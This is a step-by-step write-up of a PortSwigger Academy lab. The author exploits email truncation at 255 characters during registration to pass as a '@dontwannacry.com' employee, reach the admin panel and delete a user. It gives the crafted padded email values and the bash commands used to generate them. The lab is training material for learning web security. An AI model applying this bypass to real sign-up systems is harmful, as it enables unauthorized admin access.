PortSwigger Academy Lab: Inconsistent handling of exceptional input
Task
This lab doesn’t adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.
#### Hint
You can use the link in the lab banner to access an email client connected to your own private mail server. The client will display all messages sent to @YOUR-EMAIL-ID.web-security-academy.net and any arbitrary subdomains. Your unique email ID is displayed in the email client.
Attempt
The website has the registration feature. And on that page, there’s a message If you work for DontWannaCry, please use your @dontwannacry.com email address. This strongly indicates you can use some kind of email related vulnerability. Also in this lab, I have my own email domain @exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net.
Although the website didn’t explicitly show the admin panel, I was able to access /admin. Messaged shown: Admin interface only available if logged in as a DontWannaCry user. So if I can register an account using DontWannaCry email domain, I’ll get the access to the admin panel.
First I tried to create an account using a DontWannaCry domain:
Username: test1
Email: [email protected]
Password: pass
But there was an email verification: Please check your emails for your account registration link.
Next I tried the below:
Username: test2
Email: test2@dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass
I was able to create an account but this subdomain wasn’t considered @dontwannacry.com domain so I couldn’t access to the admin panel.
I tried a long one:
Username: test3
Email: test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass
I generated a 255 character long word using bash:
printf 'A%.0s' {1..255} | xclip -selection clipboard
I was able to create an account. My account page showed this:
Your username is: test3
Your email is: test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Count the length:
python3
print(len("test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"))
Okay only 255 letters are shown.
I wanna register with an email with @dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net and it should end with @dontwannacry.com on the account page. So the email should be 255 characters long including @dontwannacry.com part, which is 17 characters.
printf 'A%.0s' {1..238} | xclip -selection clipboard
Let’s try this one
Username: test4
Email: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass
Yay I got an access to the admin panel!! Deleted carlos and solved the lab.